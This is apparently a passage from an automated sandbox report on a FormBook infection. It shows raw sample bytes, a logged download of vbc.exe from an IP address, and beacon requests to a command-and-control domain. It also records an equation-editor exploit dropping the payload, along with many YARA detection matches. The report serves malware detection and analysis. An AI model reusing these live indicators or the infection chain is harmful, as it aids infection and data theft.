04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
          Source: global trafficHTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: schtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.metafirstclass.com
          Source: global trafficHTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
